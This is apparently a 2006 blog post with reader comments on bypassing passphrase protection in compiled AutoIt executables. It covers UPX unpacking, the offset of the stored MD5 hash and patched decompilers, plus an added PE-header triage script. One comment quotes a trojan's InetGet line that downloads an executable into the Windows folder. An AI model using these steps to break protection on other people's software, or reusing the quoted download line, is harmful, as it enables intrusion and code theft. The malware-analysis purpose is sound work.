Yet Another Update for AutoIT cracking

13 09 2006

UPDATE: New link for the file below:

I’ve been hopelessly trying to figure out how to bypass the pass-phrase for AutoIT v. One of our readers, Daniel, kindly posted a link to ANITWPA, where they already did this. I downloaded the “improved” decompiler and it worked great. Here’s a link to one of their mirrors (I couldn’t get to the original site):

Basically, they bypass the passphrase altogether. I managed to get to the point in OllyDbg (great tool, BTW, I’ll post some OllyDbg things I recently learned soon) where I found out that:

  • The passphrase used for “encrypting” is stored in the file as an MD5 hash.
  • The resulting .exe file is UPXed.
  • To find the MD5, first use the upx.exe provided by autoit (\autoit-v3.2.0.1\Aut2Exe\upx.exe) to decompress the .exe:
    • Open a command prompt and use upx.exe with the “-d” switch:
    • EXAMPLE: upx -d mytestfile.exe
    • More about UPX can be found here:
  • This will decompress “mytestfile.exe” – it almost doubles in size.
  • The MD5 hash of the passphrase is found at offset 0x0005d618 in the decompressed file (you can use hiew or any binary file viewer – even OllyDbg!).
  • When you run the exe2aut to “decrypt” the file, it will take the passphrase you enter and convert it to MD5. There is also some XORing going on. This is where I’m weak right now.
  • At some point, it will open the EXE and do…something. This is where I was stuck.
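
A triage check for the first steps above, as an added example that is not from the original post or from the decompiler project: it parses the PE section table to tell whether a sample still carries UPX section names (so `upx -d` comes first) and whether the unpacked file is large enough for the 0x0005d618 offset quoted above to apply at all. The function names and the constructed sample headers are assumptions made for illustration.

```python
import struct

PASSPHRASE_MD5_OFFSET = 0x0005D618  # offset quoted in the post (unpacked file)


def pe_section_names(data: bytes) -> list:
    """Return the section names from a PE image's section table."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (pe_off,) = struct.unpack_from("<I", data, 0x3C)  # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0" or len(data) < pe_off + 24:
        raise ValueError("PE signature or COFF header missing")
    # COFF header starts right after the 4-byte signature.
    (n_sections,) = struct.unpack_from("<H", data, pe_off + 6)
    (opt_size,) = struct.unpack_from("<H", data, pe_off + 20)
    table = pe_off + 24 + opt_size
    if table + n_sections * 40 > len(data):
        raise ValueError("truncated section table")
    return [data[table + i * 40:table + i * 40 + 8].rstrip(b"\0").decode("ascii", "replace")
            for i in range(n_sections)]


def triage(data: bytes) -> str:
    """Classify a sample: 'packed', 'unpacked', or 'unpacked-offset-out-of-range'."""
    names = pe_section_names(data)
    if any(name.startswith("UPX") for name in names):
        return "packed"  # run `upx -d` before looking at any offset
    if len(data) <= PASSPHRASE_MD5_OFFSET:
        return "unpacked-offset-out-of-range"  # different build; offset does not apply
    return "unpacked"


def build_sample(section_names, total_size=0x400) -> bytes:
    """Constructed PE header skeleton for the demo (not a runnable program)."""
    pe_off, opt_size = 0x80, 0xE0
    buf = bytearray(total_size)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, pe_off)
    buf[pe_off:pe_off + 4] = b"PE\0\0"
    struct.pack_into("<H", buf, pe_off + 6, len(section_names))
    struct.pack_into("<H", buf, pe_off + 20, opt_size)
    for i, name in enumerate(section_names):
        start = pe_off + 24 + opt_size + i * 40
        buf[start:start + 8] = name.encode("ascii").ljust(8, b"\0")
    return bytes(buf)


if __name__ == "__main__":
    print(triage(build_sample(["UPX0", "UPX1", ".rsrc"])))              # packed
    print(triage(build_sample([".text", ".rdata", ".data", ".rsrc"])))  # unpacked-offset-out-of-range
```

Section names are only a heuristic: a packer build that renames its sections will not match, so a result other than "packed" is provisional.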

I’ll examine the AutoIt3-Decompiler from CW2K to see if I can learn anything from them. If anyone has info on how they did it, please post a comment. From what I can see, it seems like they just “patched” the original AutoIT decompiler, probably to skip the whole checking of passphrases or fill in the MD5 passphrase from the one in the file.

Why am I doing this? Why do I care? Two reasons:

  1. To emphasise that people should NOT store passwords or sensitive information in their AutoIT scripts.
  2. To quote from the readme file in the “improved” decompiler above:

Often AutoIt3 is misused by Trojan writers to install their crap on your PC so the decompiler may bring some light in the dark.





27 responses

15 09 2006

“Often AutoIt3 is misused by Trojan writers to install their crap on your PC so the decompiler may bring some light in the dark.“

That’s right. Lots of these so-called AutoIt trojans are being spread among our community. Using the above tool, I had the ability to decompile them all to see how they affected my system.

Thanks very much for your great posts. Keep up your good work!

3 10 2006

The zip file is not on that url, can you please upload it somewhere?

15 10 2006

Nowadays autoitscripts can be obfuscated. So even if you can decompile, you will not be able to read the code you just decompiled.

30 12 2006

this site may help you then…

2 04 2007

Here is a working mirror for the “Improved” version:


29 05 2007

It doesn’t seem to work for me anymore on newly made scripts -.-‘

27 06 2007

Has anyone shed any new light on this subject? I have an autoit that I have been trying to get the original script from the current exe file. I have tried the tutorial at OpenRCE and it does not seem to work.


18 07 2007

I completely reverse engineered the official AutoIt3 Decompiler and made it open source. See


* can also decompile ‘Auto Hot Key Scripts’ (AHK – is some spin-off project from AutoIt)
Also I added ‘support’ for some common obfuscators like ‘van Zande’ (the one from the autoit download page) and Encode it.

For historical reasons, and for people from the East (China, Japan…) who have DBCS (Double Binary Char Set) enabled on their Windows, which myAutToExe currently doesn’t get along with, there is also the ‘Exe2Aut-CW2K-Edition2.exe’, which now also supports Unicode scripts.

->AutoIt 3-Decompiler CW2K-Edition2 + Improved

Related Forum Link

1 08 2007

Does anyone have AutoIt 3-Decompiler CW2K-Edition2 + Improved? The site is dead and I cannot download it.

9 08 2007

another mirror site ?
best regards

7 09 2007
suspicious script user

AutoIt and higher compiles to bytecode. Makes checking scripts for backdoors harder… 😦
Will anyone care to write a decompiler?

12 10 2007

Thanks for the info guys, I got an AutoIt program that I really needed but it had a trojan. With the decompiler I got on one of the URLs I could remove the trojan from the script and rebuild it =D

Look what was in the script:
InetGet("http://www.xxxxxxx/hosts.exe", "C:\WINDOWS\hosts.exe",1)

I removed that and rebuilt the script and now I’m happy =D
thanks again

11 12 2007
piyush chandra

Thank you for the great information.
I have one AutoIt Decompile (along with some latest version of AutoIt3, I downloaded).
Just got interested in AutoIt after I decompiled a nasty Trojan.. 🙂

The links that you have mentioned here are no longer available, I need some decompiler that “bypass the passphrase”… please help me.
Got to decompile a few more Trojans.. 😉

27 03 2009

Hey, if you guys came through any AutoIT-written viruses, split them into a lot of pieces (use a simple splitter), zip all the files and mail it to me at. I think I will then try my best to program a cure to those viruses and mail it to whoever you are. Try me, maybe you’ll find help. Don’t worry, I’m not a spammer. I just want to help!!!

27 03 2009

But remember it will take a little bit of time 🙂

23 05 2009


29 07 2009

I got this bot that has a password on it – does anyone have a current way to break the encryption and decompile an exe?

All the old links are dead.. Please help 🙂


5 09 2012

hi………how can I debug an autoit file using Olly debug?……
